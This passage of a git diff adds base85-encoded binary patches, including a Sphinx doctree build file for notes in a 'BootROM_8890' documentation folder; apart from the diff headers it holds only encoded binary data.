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
Liik*UJDd3bg(sq6

literal 0
HcmV?d00001

diff --git a/documentation/_build/confluence/.doctrees/BootROM_8890/04_notes.doctree b/documentation/_build/confluence/.doctrees/BootROM_8890/04_notes.doctree
new file mode 100644
index 0000000000000000000000000000000000000000..f965b1ae329c38c773676a95c887566056d71aa4
GIT binary patch
literal 27206
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
